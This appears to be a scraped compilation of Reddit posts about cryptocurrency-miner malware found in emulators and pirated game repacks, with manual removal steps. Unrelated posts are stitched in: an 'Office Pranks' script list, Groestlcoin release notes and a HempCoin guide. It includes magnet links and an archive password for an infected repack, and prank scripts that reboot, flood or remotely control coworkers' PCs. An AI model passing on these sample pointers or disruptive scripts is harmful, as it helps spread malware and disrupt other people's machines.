BitCoinMiner Removal Tool. Remove BitCoinMiner Now

possible bitcoin miner syswin32.exe, need help with removal

specs: windows 10 latest edition, i5 6600k, gtx 770, 8gb ddr4 ram, 1tb toshiba sshd
So my little cousin was using my computer and downloaded some emulators via youtube and ever since whenever my pc goes idle my gpu usage increases and fan speed increases. The file behind this seems to be syswin32.exe which shows up in my user folder along with some other .dll files. Even after deleting all these files, they show up again after another idle session.
I've ran malware bytes hitmanpro and they still haven't been able to get rid of the miner.
any help is greatly appreciated!
submitted by Coldchilln to techsupport [link] [comments]

Removed bitcoin miner malware .exe but windows keeps trying o reopen it

Hi guys, I have just deleted a bitcoin miner malware from my computer using malwarebytes. After that I removed the malwarebytes app from my computer. The thing is that I was hearing that sound when you stick out a flash drive from your computer. After checking the windows events, it seems like my windows is trying to reopen the malware without success, since I removed the .exe. How do I stop windows from trying to reopen the malware .exe?
submitted by cipa99 to techsupport [link] [comments]

Remove the WindowsTime.exe Bitcoin Miner

Remove the WindowsTime.exe Bitcoin Miner submitted by xezirone to Bitcoin [link] [comments]

Remove the WindowsTime.exe Bitcoin Miner

Remove the WindowsTime.exe Bitcoin Miner submitted by BitcoinAllBot to BitcoinAll [link] [comments]

Remove the WindowsTime.exe Bitcoin Miner

Remove the WindowsTime.exe Bitcoin Miner submitted by xezirone to btc [link] [comments]

Fitgirl Assassins Creed Origins install bitcoin miner causing high cpu usage when Task Manager is not running

Fitgirl Assassins Creed Origins install bitcoin miner causing high cpu usage when Task Manager is not running
Hello,I downloaded Assasins creed origins today from this site: fitgirl-repacks dot site And something feels odd when I exit the game, my CPU is running at roughly 60%, and as soon as I open task manager it would go back to normal. I ran malwarebytes and it found 2 suspicious items and removed them, but the problem continue, so I started to investigate manually. So I start up Performance Monitor and check which process would shoot up as soon as I close Task Manager. This is what I found. SoundModule. I open up Task Manager, and found 2 running process of this, I open their location and found them at AppData\Roaming\Microsoft\SoundModule.
I quickly look these up, they do not belong to microsoft and won't trigger any antivirus or malwarebytes, I killed those process and deleted them which solved the problem for me. Hopefully this post will help someone in the future.
For more details regarding this "SoundModule" https://www.anti-malware.name/removal-guide/remove-soundmodule-exe/
I started the game again after that and the "soundmodule" executable or process did not get recreated.
If you pirate a game, make sure you check on your CPU usage to see if there is an suspicious thing going on. In my case, I only realized that something is running on my cpu due to CoreTemp, because I would see the temperature be at 60 to 70 degree Celsius, while my normal idle temp is usually only at 40 to 60, and as soon as I start Task manager, the temperature did drop back to 40ish.
https://preview.redd.it/p0tdcjf4vpm41.png?width=1576&format=png&auto=webp&s=f20dfabcc39a685e86e66ee4a9fc33604396de4d
I have ran the script to verify bins a few times before installing cause it didnt seem to do anything to me. Installed the game and had the cpu issue.
P.S. If you don't trust me, that is fine. This post is not for you. I am not here to convince you or trash fitgirl. We are all pirates here, we are all stealing in someway. This post is mainly for someone else that may have this problem in the future.
If anyone have similar issue, and don't know how to find the bitcoin miner in their pc, do not be shy to private message me, I am happy to help. It is very easy for developers to scan for running process and stop work while a given process is opened, thus the miners process will continue to evolve to hide under more and more programs, so it will become very difficult at some point.
UPDATE:
I was contacted by 2 people that have seen this post. 1 person has installed the same package and was not affect. Another person has installed the same package and was affected. Chance is the installer is installing the bitcoin miner based on random number generator.
submitted by relf218 to PiratedGames [link] [comments]

ProxyGate

ProxyGate
Hello reddit, I was playing games yesterday, when I realised my cpu and memory usage was extremely high. I was looking through task manager, and saw a substantial amount was due PG COMPONENT 32. I did some research and apparently, it ties into something called cloud.exe. Most sites are telling me that its a virus, and I want to remove it. I have attached the folder of said Cloud.exe (part of PROXYGATE), and was about to delete it. However, I am not sure what to do. Alarmingly, malwarebytes reported some sort of bitcoin miner, along with the cloud. Please help me finding a solution and also tell me about a good (and free) AV, I can use to protect myself in the future
Edit: I would like to post an update here. I downloaded MalwareBytes, and tried to delete the files this time. Not only that, it detected 100s of malware, bitcoin miners etc on my system. I removed them all, and my computer has never been faster; my cpu usage, ram have gone down by more that 80%. Thank you guys for the help and advice.
https://preview.redd.it/7n307ek01tz41.png?width=1656&format=png&auto=webp&s=56915091e1cc74a10783a5af466be75f80696120
submitted by IAMABUNNINGSNAG to antivirus [link] [comments]

WARNING: Andy Android emulator (AndyOS, Andyroid) drops a bitcoin miner on your system

lawrenceabrams has done a lot more digging and research and has published an article which you can read here.
Update: Their Facebook support group has been changed to a closed group meaning you can't view their posts if you're not already a member. Luckily I have a fair few sleeper accounts in that group and I'll report back with anything worth noting.
Clarification: In the video I fail to close Andy when checking my GPU stats but I can confirm that they are roughly the same as when Andy is open. The mining process runs even with Andy closed and it opens on startup. I use the term bitcoin in this thread and the video as it's almost become a generic trademark. People instantly know what bitcoin is. I used cryptocurrency when talking to people in the Andy support group and they got confused and thought I was talking out my arse.
MAJOR UPDATE: I asked the Andy staff why they're still serving the infected file. After seeing that comment, and probably after seeing this reddit thread they've removed me from the group.
A friend opened Andy in process explorer to see the files it drops upon installation. By the looks of things, the installer isn't at fault. Andy itself calls an IP which then transfers the bitcoin miner to your system.
Andy clearly have no interest in fixing this issue and they're doing their best to censor it. At this point I wouldn't be surprised if this is completely down to their doing. The fact that they've completely blocked me from contacting them and the removal of all of my posts to them suggests that they don't care and don't want anyone to know.
Please keep in mind that this may not directly be Andy's fault. I'm not trying to directly accuse Andy of being at fault here but until an official statement is made from the Andy team I'm going to tell it how it is, and how the majority of people will see this situation. The installer Andy uses drops a cryptocurrency miner on your system and it has been reported in the past but no effort has been taken to cut ties with the company that created the installer. This is still Andy's responsibility. Funnily enough, the owners of Andy and the admins in the Andy support Facebook group actually recommend turning off your antivirus whilst installing.
All evidence provided on this post is true with version 'Andy_Nougat_260_1096_26' (latest release available from the official Andy website).

Backstory

I was searching for an Android Emulator and came across an Android Authority list of the 15 best Android emulators for PC (now 14 after I contacted the writer of the article with evidence). I saw Andy was on this list and it was described as a big competitor to the likes of Bluestacks. I'd used Bluestacks previously but I was looking for a different emulator just to try something new. I downloaded Andy, installed it (I declined the offer relating to Yahoo), and began using it. I finished up what I was doing, closed Andy and opened some games. I noticed that in every single game I played I suffered major FPS drops at seemingly random times. I checked my GPU usage and temps and noticed they were working at roughly 80% load and 80+ degrees C whilst gaming. Very unusual for my setup. I opened task manager and sorted it via what was using the most GPU power and found a process named 'updater.exe'. After further inspection I noticed that this installed along with Andy.

Evidence

I created a video showcasing the entire installation process, including GPU usage before and after Andy was installed. This was sent directly to the creators of Andy (which is who I'm referencing in the video), as they refused to believe that the bitcoin miner was anything to do with installing their software. Apparently giving them virustotal scans and screenshots are not enough evidence and some users in the Andy support Facebook group blindly tried accusing me and my friends of using a tampered installer. The video shows that I downloaded every single executable possible from their official website and I was served the same installer each time.

How to remove Andy

Removing Andy and the bitcoin miner is actually really easy. The miner doesn't even attempt to hide itself and doesn't have a specific payload so it's just always running.
  1. Close every Andy-related process via task manager.
  2. Uninstall Andy via Windows
  3. Look for a process named 'Updater' (This is the miner and surprisingly enough won't be uninstalled when you uninstall Andy! Would you believe it!)
  4. Right click that process and click 'Go to details'
  5. Right click 'Updater.exe' in details and click 'End process tree'
  6. Navigate to C:\Program Files (x86)
  7. Click once on the folder named 'Updater' and then press Shift+Delete
  8. Click once on the folder named 'AndyOS' and then press Shift+Delete
  9. Recheck task manager to confirm no more Andy services are running
  10. Download Malwarebytes and perform a full system scan to check if anything was missed
  11. Download CCleaner and do a registry fix. Multiple Andy registry entries will be found. Delete these and scan again to ensure that nothing was missed

Why didn't my antivirus detect it?

The likelihood is that your antivirus probably thought you wanted it. If every antivirus detects bitcoin miners as a threat then it's only going to get in the way of people who genuinely want to mine bitcoins on their system for personal use.

What now?

The Andy development team claim they are 'looking into this', but it has been reported to them in the past and nothing has changed at all. It has been removed off of the list of best Android emulators by Android Authority after I contacted the writer of the article with this evidence. He also installed Andy and confirmed that something fishy is going on. Even after being provided with evidence, the infected installer is still served today from their website.

Andy devs giving conflicting stories

Someone working for Andy by the name of Ghazi has been urging people to stop spreading the claims that Andy installs a bitcoin miner by saying that Andy doesn't mine for bitcoins and that we've been using an older version, which uses a similar method as Andy requires something to do with blockchain technology. This makes no sense. I don't understand why a modified ROM and basic application that hooks into a virtual machine would require anything to do with blockchain technology. Another reason this makes no sense is that the OWNERS of Andy said that it shouldn't be there, and that it's not their fault because they use a third party installer provided by another company. Two very conflicting stories.

TL;DR

In summary, when you install Andy from their official website, you 100% receive a bitcoin miner.
I will update this post with any further advancements.
Edit: The thing Ghazi was talking about is a deprecated ‘Andy Cloud Experiment’ which is no longer in use. They are still looking into the current issue but are still serving the infected file.
Edit: After being banned from their support group I got in on another account. I made a post and when I told them who I was they instantly banned me again. Fantastic! Great guys! Professionals!
Edit: Joined on a third account and was banned again! What a surprise!

In the news:
Betanews: https://betanews.com/2018/06/18/andy-os-bitcoin-mine
submitted by TopWire to emulators [link] [comments]

JC3 XL SEYTER has bitcoin miner!

Installation took about 8 hours on my pc. I was sleeping, anyways it looks like try to install these files when directx and other visual thing came up. Be carefull you dont want your pc to be victim.
Im suggesting to *scan your computer if you installed any SEYTER repack*, scan with Avira Free or Malwarebytes Free. Both working nice.

HOW TO REMOVE IT
  1. Download and install Malwarebytes, Avira or AVG from their site.
  2. Scan your C:(Windows) drive and wait for it to find Miner files.
  3. If there is check folder name and go manually there or delete from antivirus-antimalware.
  4. You should really delete that folder.

F.A.Q.
Q: DELETING GAME CLEANS MY PC?
A: NO.
Q: IS ALL ISSCH FILES BITCOIN MINEMALWARE?
A:NO, CHECK CREATION DATES.
Q: I DIDNT DOWNLOAD FROM RUSTORKA, DO I HAVE BTCMINEMALWARE?
A: YOU PROBABLY HAVE IT.
**MakeItYours9** Check your "Task Scheduler" I've found an ISSCH reference there and deleted it. 
QUOTE FROM FITGIRL
I can confirm that at least early RotTR Seyter's repack contained malware. I've put an investigation on rutor. And magnet links for rustorka (magnet:?xt=urn:btih:e41e3e6b8ce4701792f1b3a4ca4f5c43034626ae) and rutor (magnet:?xt=urn:btih:112b33845accf5d39ed92d2bee58bb2d2b307d66) are still active, so anyone can make sure, that game-7.bin contains the virus installer, while EXEs are different for two magnets. Why exactly Seyter made it and not some other uploader? It's simple. Seyter uses modified FreeArc, made by this tool: http://krinkels.org/threads/fa_protect.1873/ When you generate a new FreeArc copy with FA_Protect, you enter the password, it's unique. And the archives, created with your version of FreeArc won't be compatible with original FreeArc. And game-7.bin can ONLY be extracted by using unarc.dll in Seyter's repack. As all other his archives. So only Seyter could create that bin. One more thing. Both setup.exe's have the same size. But if you make byte-comparision, you'll see that they are different. First I've made xdelta between them, and xdelta file was ~16 KB. Then I ran both installers and made memory dumps with Process Explorer. Then looked for installer section (Inno Setup leaved many traces in memory). I've checked the number of unpacked archiees, and found out, that game-7.bin is only unpacked in rutor (not rustorka) version. Then I've found the password for that archive (555, while other bins use 9im6rXzBCM0zAAfnfesw). You can download the unpacker here: http://www35.zippyshare.com/v/D3x1w1cy/file.html When you extract setup.exe from game-7.bin - DO NOT RUN IT, until you know what you're doing. If you have friends who can deal with such stuff - hand the file to them. When I knew that setup.exe resides in game-7.bin, I searched for it in rutor setup memory dump. And have found that it extracts to user local app data folder and then silently runs. ISSCH.exe install in pretty random folder, so it can be anywhere. So yes. It's 100% positive, that it was the Seyter, who did the infected repack. His idea was to blame others for infecting his reuploads, cause Rustorka installer CONTAINS the bin-file, but never runs it. He's a moderator on Rustorka and a friend of Rustorka's admin, Markus. And that's why he don't shit at home, but feels comfortabe to infect his uploads for other sites. After my investigation (and CPY crack release) he updated his repack on Rustorka, and removed notorius game-7.bin. But Internet remembers everything, and the magnets are alive. Avoid any Seyter repacks in the future. If you don't like my repacks, stick to one of those: RG Mechanics RG Revenants Xatab RG Catalyst As myself, they never put malware in repacks and you'll be safe. Now, when I registered on Reddit, you can ask questions about my repacks if you have some.
submitted by sanerdk to CrackStatus [link] [comments]

Groestlcoin 6th Anniversary Release

Introduction

Dear Groestlers, it goes without saying that 2020 has been a difficult time for millions of people worldwide. The groestlcoin team would like to take this opportunity to wish everyone our best to everyone coping with the direct and indirect effects of COVID-19. Let it bring out the best in us all and show that collectively, we can conquer anything.
The centralised banks and our national governments are facing unprecedented times with interest rates worldwide dropping to record lows in places. Rest assured that this can only strengthen the fundamentals of all decentralised cryptocurrencies and the vision that was seeded with Satoshi's Bitcoin whitepaper over 10 years ago. Despite everything that has been thrown at us this year, the show must go on and the team will still progress and advance to continue the momentum that we have developed over the past 6 years.
In addition to this, we'd like to remind you all that this is Groestlcoin's 6th Birthday release! In terms of price there have been some crazy highs and lows over the years (with highs of around $2.60 and lows of $0.000077!), but in terms of value– Groestlcoin just keeps getting more valuable! In these uncertain times, one thing remains clear – Groestlcoin will keep going and keep innovating regardless. On with what has been worked on and completed over the past few months.

UPDATED - Groestlcoin Core 2.18.2

This is a major release of Groestlcoin Core with many protocol level improvements and code optimizations, featuring the technical equivalent of Bitcoin v0.18.2 but with Groestlcoin-specific patches. On a general level, most of what is new is a new 'Groestlcoin-wallet' tool which is now distributed alongside Groestlcoin Core's other executables.
NOTE: The 'Account' API has been removed from this version which was typically used in some tip bots. Please ensure you check the release notes from 2.17.2 for details on replacing this functionality.

How to Upgrade?

Windows
If you are running an older version, shut it down. Wait until it has completely shut down (which might take a few minutes for older versions), then run the installer.
OSX
If you are running an older version, shut it down. Wait until it has completely shut down (which might take a few minutes for older versions), run the dmg and drag Groestlcoin Core to Applications.
Ubuntu
http://groestlcoin.org/forum/index.php?topic=441.0

Other Linux

http://groestlcoin.org/forum/index.php?topic=97.0

Download

Download the Windows Installer (64 bit) here
Download the Windows Installer (32 bit) here
Download the Windows binaries (64 bit) here
Download the Windows binaries (32 bit) here
Download the OSX Installer here
Download the OSX binaries here
Download the Linux binaries (64 bit) here
Download the Linux binaries (32 bit) here
Download the ARM Linux binaries (64 bit) here
Download the ARM Linux binaries (32 bit) here

Source

ALL NEW - Groestlcoin Moonshine iOS/Android Wallet

Built with React Native, Moonshine utilizes Electrum-GRS's JSON-RPC methods to interact with the Groestlcoin network.
GRS Moonshine's intended use is as a hot wallet. Meaning, your keys are only as safe as the device you install this wallet on. As with any hot wallet, please ensure that you keep only a small, responsible amount of Groestlcoin on it at any given time.

Features

Download

iOS
Android

Source

ALL NEW! – HODL GRS Android Wallet

HODL GRS connects directly to the Groestlcoin network using SPV mode and doesn't rely on servers that can be hacked or disabled.
HODL GRS utilizes AES hardware encryption, app sandboxing, and the latest security features to protect users from malware, browser security holes, and even physical theft. Private keys are stored only in the secure enclave of the user's phone, inaccessible to anyone other than the user.
Simplicity and ease-of-use is the core design principle of HODL GRS. A simple recovery phrase (which we call a Backup Recovery Key) is all that is needed to restore the user's wallet if they ever lose or replace their device. HODL GRS is deterministic, which means the user's balance and transaction history can be recovered just from the backup recovery key.

Features

Download

Main Release (Main Net)
Testnet Release

Source

ALL NEW! – GroestlcoinSeed Savior

Groestlcoin Seed Savior is a tool for recovering BIP39 seed phrases.
This tool is meant to help users with recovering a slightly incorrect Groestlcoin mnemonic phrase (AKA backup or seed). You can enter an existing BIP39 mnemonic and get derived addresses in various formats.
To find out if one of the suggested addresses is the right one, you can click on the suggested address to check the address' transaction history on a block explorer.

Features

Live Version (Not Recommended)

https://www.groestlcoin.org/recovery/

Download

https://github.com/Groestlcoin/mnemonic-recovery/archive/master.zip

Source

ALL NEW! – Vanity Search Vanity Address Generator

NOTE: NVidia GPU or any CPU only. AMD graphics cards will not work with this address generator.
VanitySearch is a command-line Segwit-capable vanity Groestlcoin address generator. Add unique flair when you tell people to send Groestlcoin. Alternatively, VanitySearch can be used to generate random addresses offline.
If you're tired of the random, cryptic addresses generated by regular groestlcoin clients, then VanitySearch is the right choice for you to create a more personalized address.
VanitySearch is a groestlcoin address prefix finder. If you want to generate safe private keys, use the -s option to enter your passphrase which will be used for generating a base key as for BIP38 standard (VanitySearch.exe -s "My PassPhrase" FXPref). You can also use VanitySearch.exe -ps "My PassPhrase" which will add a crypto secure seed to your passphrase.
VanitySearch may not compute a good grid size for your GPU, so try different values using -g option in order to get the best performances. If you want to use GPUs and CPUs together, you may have best performances by keeping one CPU core for handling GPU(s)/CPU exchanges (use -t option to set the number of CPU threads).

Features

Usage

https://github.com/Groestlcoin/VanitySearch#usage

Download

Source

ALL NEW! – Groestlcoin EasyVanity 2020

Groestlcoin EasyVanity 2020 is a windows app built from the ground-up and makes it easier than ever before to create your very own bespoke bech32 address(es) when whilst not connected to the internet.
If you're tired of the random, cryptic bech32 addresses generated by regular Groestlcoin clients, then Groestlcoin EasyVanity2020 is the right choice for you to create a more personalised bech32 address. This 2020 version uses the new VanitySearch to generate not only legacy addresses (F prefix) but also Bech32 addresses (grs1 prefix).

Features

Download

Source

Remastered! – Groestlcoin WPF Desktop Wallet (v2.19.0.18)

Groestlcoin WPF is an alternative full node client with optional lightweight 'thin-client' mode based on WPF. Windows Presentation Foundation (WPF) is one of Microsoft's latest approaches to a GUI framework, used with the .NET framework. Its main advantages over the original Groestlcoin client include support for exporting blockchain.dat and including a lite wallet mode.
This wallet was previously deprecated but has been brought back to life with modern standards.

Features

Remastered Improvements

Download

Source

ALL NEW! – BIP39 Key Tool

Groestlcoin BIP39 Key Tool is a GUI interface for generating Groestlcoin public and private keys. It is a standalone tool which can be used offline.

Features

Download

Windows
Linux :
 pip3 install -r requirements.txt python3 bip39\_gui.py 

Source

ALL NEW! – Electrum Personal Server

Groestlcoin Electrum Personal Server aims to make using Electrum Groestlcoin wallet more secure and more private. It makes it easy to connect your Electrum-GRS wallet to your own full node.
It is an implementation of the Electrum-grs server protocol which fulfils the specific need of using the Electrum-grs wallet backed by a full node, but without the heavyweight server backend, for a single user. It allows the user to benefit from all Groestlcoin Core's resource-saving features like pruning, blocks only and disabled txindex. All Electrum-GRS's feature-richness like hardware wallet integration, multi-signature wallets, offline signing, seed recovery phrases, coin control and so on can still be used, but connected only to the user's own full node.
Full node wallets are important in Groestlcoin because they are a big part of what makes the system be trust-less. No longer do people have to trust a financial institution like a bank or PayPal, they can run software on their own computers. If Groestlcoin is digital gold, then a full node wallet is your own personal goldsmith who checks for you that received payments are genuine.
Full node wallets are also important for privacy. Using Electrum-GRS under default configuration requires it to send (hashes of) all your Groestlcoin addresses to some server. That server can then easily spy on your transactions. Full node wallets like Groestlcoin Electrum Personal Server would download the entire blockchain and scan it for the user's own addresses, and therefore don't reveal to anyone else which Groestlcoin addresses they are interested in.
Groestlcoin Electrum Personal Server can also broadcast transactions through Tor which improves privacy by resisting traffic analysis for broadcasted transactions which can link the IP address of the user to the transaction. If enabled this would happen transparently whenever the user simply clicks "Send" on a transaction in Electrum-grs wallet.
Note: Currently Groestlcoin Electrum Personal Server can only accept one connection at a time.

Features

Download

Windows
Linux / OSX (Instructions)

Source

UPDATED – Android Wallet 7.38.1 - Main Net + Test Net

The app allows you to send and receive Groestlcoin on your device using QR codes and URI links.
When using this app, please back up your wallet and email them to yourself! This will save your wallet in a password protected file. Then your coins can be retrieved even if you lose your phone.

Changes

Download

Main Net
Main Net (FDroid)
Test Net

Source

UPDATED – Groestlcoin Sentinel 3.5.06 (Android)

Groestlcoin Sentinel is a great solution for anyone who wants the convenience and utility of a hot wallet for receiving payments directly into their cold storage (or hardware wallets).
Sentinel accepts XPUB's, YPUB'S, ZPUB's and individual Groestlcoin address. Once added you will be able to view balances, view transactions, and (in the case of XPUB's, YPUB's and ZPUB's) deterministically generate addresses for that wallet.
Groestlcoin Sentinel is a fork of Groestlcoin Samourai Wallet with all spending and transaction building code removed.

Changes

Download

Source

UPDATED – P2Pool Test Net

Changes

Download

Pre-Hosted Testnet P2Pool is available via http://testp2pool.groestlcoin.org:21330/static/

Source

submitted by Yokomoko_Saleen to groestlcoin [link] [comments]

Keep Your Eyes Out For Bitcoin Miners | Windows (R) Contacts Import Tool [wabmig.exe]

Even though this is a specific case, hopefully it serves nonetheless as a reminder for those of you who sail the high seas. Check your GPU and CPU usage for any strange activity (Bitcoin miners), as sometimes scans from Windows Defender and even Malwarebytes can miss them.
Noticed your games and PC in general performing slowly lately? For me, it was a decrease in frames and stuttering exactly every second, for my friend it decreased her performance significantly and put her GPU usage up to 90% constantly.
It appeared as a process in Task Manager using 30% of my CPU: Microsoft (R) Contacts Import Tool. Upon killing it our GPU usage went down to idle and as did our CPU usage. Upon further investigation I found it as a file (wabmig.exe) in a folder called Windows Mail. Now here's the weird thing, it was in my Riot Games folder in AppData, right alongside League of Legends. The removal is fairly simple: kill the process and delete the folder (empty your recycle bin too!).
Now of course this just screams Bitcoin miner, so I scanned it with Malwarebytes and Defender... nothing. However, scanning it with VirusTotal revealed this. Here you can see an analysis of the entire Windows Mail folder we found. We had been installing things from the high seas, so to speak, so it most certainly came from that. I couldn't pinpoint which installer contained the miner but they were all fairly popular things. If you're flying the black flag, keep an eye on your usages.
I understand this might be a strange place to post something like this, and no, I'm not going to sit here and say "oh I didn't do anything dangerous" etc., however I've had a lot of experience at sea and yet I still got caught out. I think it's important for everyone to remember that Bitcoin miners can happen to even the more secure of us.
tl;dr - If your games have become sluggish out of nowhere, you could have a Bitcoin miner. Be safe when sailing the seven seas.
Edit: If anyone wants to disect the folder, PM me for a link to it. Just be careful obviously.
Edit 2: As a few people have suggested, Process Explorer is a great way to check your CPU and GPU usage.
submitted by TheXRTD to pcgaming [link] [comments]

FOLLOWUP: Andy OS (Andy Android Emulator)

Recap

My post, which you've probably seen exposed Andy Emulator for installing a cryptocurrency miner on the host PC. After contacting them endlessly on their Facebook support page (which seemed to be the only active support forum for this software) I was met with a ban each time. The news about Andy spread super fast and articles were made about it on sites such as BleepingComputer, Android Community, BetaNews, Tech Republic and countless more. It was safe to say that the owners of Andy could no longer avoid the issue. After seeing the backlash, the owner of the support Facebook group changes the privacy of it and prevented anyone from posting anything at all.

Removal of miner

A few days after the press got ahold of what was going on, Andy completely replaced their installer. Why this installer wasn't served in the first place is beyond me. The new installer no longer calls the hidden 'GoogleUpdate.exe' (which installs the miner). Upon closing Andy, all processes relating to it close after a few seconds. It's great that they've removed the miner, but I still wouldn't trust this company with anything.

Issues

Contradiction
As outlined in my previous post, two staff members at Andy gave different explanations as to why the miner was installed on the system, both of which can be proved wrong. A support member claimed that it was left over from a previous version of Andy that contained the 'Andy Cloud Experiment' which utilised blockchain technology (although I'm not sure why anything like this would require blockchain technology). This was then overruled by the Andy OS Inc. COO (or possibly their CTO), claiming that the installer was from a third party and that they'll look into it. Upon further inspection from lawrenceabrams over at Bleeping Computer, he discovered that the executable named 'GoogleUpdate.exe' was what installed the miner and was actually signed by Andy OS Inc. In the most recent version, this executable is no longer present meaning it probably wasn't even needed in the first place. If it really was needed in the previous version, so much so that they had it officially signed... then why did it install a cryptocurrency miner? The miner installation was signed by Andy themselves, so they cannot deny that it was nothing to do with them.
No apology/statement
The majority of publications which reported on this issue asked Andy for comment to which they were met with no response (surprise surprise). In addition to this, as mentioned previously, their public support forum is no longer accepting new threads. Nobody over at Andy has bothered to publicly address this issue or to even attempt to try and clear their name (with the exception of some people in the support group who were extremely dismissive of the whole thing). To me it seems like they don't want to address it at all. It's being swept under the rug by them and I'm guessing once it's all blown over they'll open their Facebook group back up.
Version numbers
You would have expected, with this latest update, that they'd update the version number on their website. Nope. The version number is exactly the same as what it was before, even down to the date. I also noticed a fake star rating system which can't even be interacted with. By the looks of things, they've given themselves 4.5/5 stars. Where is that information sourced from?

Conclusion

In the past, Andy has had some shady things going on and with this most recent issue, even more so. Personally, I don't think I'd want to download anything that comes out of that company ever again. A massive breach of trust has been handed to their userbase.
Andy, give us answers. Tell us what happened and why it happened. Why was the miner installation file signed by your company if the installer was from a third party?
Thanks for the support with this issue everyone and thanks for spreading my original post around like wildfire. It definitely helped get the word out!
submitted by TopWire to Android [link] [comments]

Office Pranks

Me and some coworkers often enjoy some pranks to lighten each other's days and break up the serious work ethic. I wanted to share this repo with everyone, full of our funniest ones:

https://github.com/kaburkett/office-pranks

Does anyone have some favorites they would like to contribute? Here is the list of pranks currently available in the repository above:

Bitcoin Miner

Reboots computer when colleage attempts to open fake bitcoin miner.

Cisco Jabber

Sets a scheduled task to call designated number once a day automatically.
Requires: Cisco Jabber client
Note: IMs can be influenced using im: as url instead of ciscotel:
im:[email protected];[email protected];[email protected]?message;subject=I.T%20Desk;body=Jabber%2010.5%20Query 
Multiple people can be called using ciscotelconf: instead of ciscotel:
CISCOTELCONF:[email protected];[email protected] 
Alternatively:
Run multiCall.cmd through powershell or cmd.

Issues

Opens Issues by Julia Michaels on users browser at startup

Excel Spreadsheet

Contains a macro that launches a webpage when the workbook is opened. Macros must be enabled. Press Alt+F11 to edit the macro and alter the webpage that gets launched.

Eject CD

Ejects cd drive on user's computer remotely.
Requires: psexec (download here: https://docs.microsoft.com/en-us/sysinternals/downloads/psexec)

Chrome Bomb

Disables chrome usability and opens 10 windows every time it's launched. The best way to reverse this is to reinstall chrome.

Mouse Jiggler

Works similarly to eject cd, but requires session id to run as user as a parameter
Requires: psexec (download here: https://docs.microsoft.com/en-us/sysinternals/downloads/psexec)
To end, run:

Keyboard Remap

Will replace spaces with dashes. Warning: after use, passwords with spaces will not work

Kill Windows Explorer

Kills windows explorer on the target machine which removes the taskbar, windows icon and closes any open folders.
This prank doesnt require any code to run.
To reenable the user must open task manager, choose add new task and enter explorer.exe

Symantic Antivirus

Displays a cmd window to fool a user into waiting for antivirus definitions to update. Finishes update at 69 and 420 %.


submitted by klbrkt to PowerShell [link] [comments]

Bitcoin Miner malware, detected with Malware Bytes but I believe it's still hidden somewhere.

so a few days ago I did something stupid and tried to torrent a game for the first time and ended up installing a Bitcoin Miner onto my PC :/ It was very obvious that it was malware as it quickly seemed to hijack Google Chrome. I scanned with Windows Defender but nothing was found so I checked out the sticky post on here and got a trial of Malware Bytes, which detected the malware and quarantined it, then I removed it. I really thought it was that simple but I think it's still there. I had Spotify playing music on idle and got curious, did CTRL + ALT + DELETE to open up Task Manager and quickly saw my CPU % shoot down from 100% to 2% - %5, which is what it's been sitting at when I'm using it right now.
Other than that, there are a couple of weird things that make me think the virus is still there:
  1. Programs keep getting Suspended status in Task Manager (this is happening to Malware Bytes and Google Chrome), which never used to happen before. This a brand new PC I built in January so it shouldn't be doing this that often. I tried to open Malware Bytes now to scan again and it just froze on "Not Responding" and I can't seem to close it...
  2. There is a strange "Suspended" background process in Task Manager that uses up 3.6MB of memory. Here's a screenshot of what it looks like: http://prntscr.com/lchp1w :(
  3. When I right click ^ "open file location" on the suspended process and the 2 others below it, the location I get is C:\Windows\SysWOW64 and it's titled svchost.exe, which I read is a normal Windows process but there are A LOT of them running in my Task Manager right now
  4. All the other svchost.exes are under C:\Windows\System32, which I read is fine. Does this mean that the one in SysWOW64 is malware/infected?
As per the stickied thread, I ran rkill.com and turned on "scan for rootkits" in my Malware Bytes trial, and also ran the ADWCleaner. I did all of the above after I had originally removed the malware with Malware Bytes, so all these second scans didn't detect anything. Is there anything else I could do to actually detect the malware and remove it?
EDIT: Google Chrome keeps not responding, same with Malware Bytes. Can't uninstall Malware Bytes and Firefox stopped responding too. Writing this on my phone since I turned everything off briefly after writing this post, since my mouse started moving extremely slow and a repetitive beeping sound started coming out of my speakers. I swear it was like whatever infected me detected whenever I looked up information on malware removal and visited this subreddit ...
submitted by rsarector to techsupport [link] [comments]

Explorer doesn't start automatically on boot anymore

I installed something shady I guess, and I ended up with a bitcoin miner running in the background of my pc.

I've removed it manually, but I must have missed something because when I reboot the system, it sits on a black screen with the command prompt open. I type explorer.exe in there and hit enter and i'm good to do (or crtl alt del and new task explorer.exe works.)

Is there an easy way to fix this? I'm sure I could add explorer.exe to my startup programs or something like that, but I think it has something to do with the registry...?

(This is the youtube video I found with the fix https://www.youtube.com/watch?v=tZiQ4bPgwVk )
submitted by PartWave269 to Windows10 [link] [comments]

The Hempcoin Community Guide Q1 201

Table of contents:

  1. Preface
  2. Tools:
    • Masternode Calculator
    • Fork Preparedness guide
    • Mining Guide
  3. Current projects
  4. Social Platform Links
  5. F.A.Q's
 

Preface

In the past month, we, the team at The HempCoin have been making some huge changes, both internally and business development wise. We have added 3 new roles to the team: Community Outreach Manager, Business Development Manager, and Brand Ambassadors. Thanks to this, we have had many new developments which have shifted our timeframe a little as you may have seen. That being said, we are committed to ensuring our community is kept as up-to-date as possible and provided with as many support materials as we can create. We've spent the better half of two weeks writing up this guide and the tools included in it, in hopes that it will help answer many of the common questions we have been seeing and even some of the less common ones.
 

Tools

Masternode Calculator:
Ever since we have announced that we will be forking into a masternode coin, we have been asked for the details and specifics of the reward payout for a node. Seeing this, we have created a Spreadsheet that is editable by the community. It will calculate the rewards for any number of nodes, and also tell you the expected payout in USD based on a price the user can input. You can find the link to the sheet here.
 
Fork Preparedness Guide:
This guide will ensure you will be completely prepared for the upcoming fork. We have been seeing many questions about the fork which is understandable, and hopefully, this will alleviate many of those by ensuring all of our investors know how to make sure they are prepared, no matter their platform.
Windows: Currently there are two options for coin storage on windows. Bittrex, the exchange that THC is currently traded on, or our official wallet. the safest and most secure option would be to store your coins in the private wallet, however, Bittrex has also confirmed with us that they will be supporting our fork. If you are planning on storing your coins there, all you need to do is purchase the THC and leave it be, once we fork, you will get the new coin from bittrex automatically and that is all. If you intend on using our private wallet, you can download the most up-to-date version from our GitHub here. Once you install it, you will need to let it run to synchronize, this has been known to take a very long time (due to having to sync all blocks since 2014). Once we fork, we will ensure this is alleviated, however, for now, you can follow the tutorial that was written here which will help you go from needing about 2 weeks to sync to about 3 hours at max. Either of these coin storage options will ensure you are completely supported during our fork.
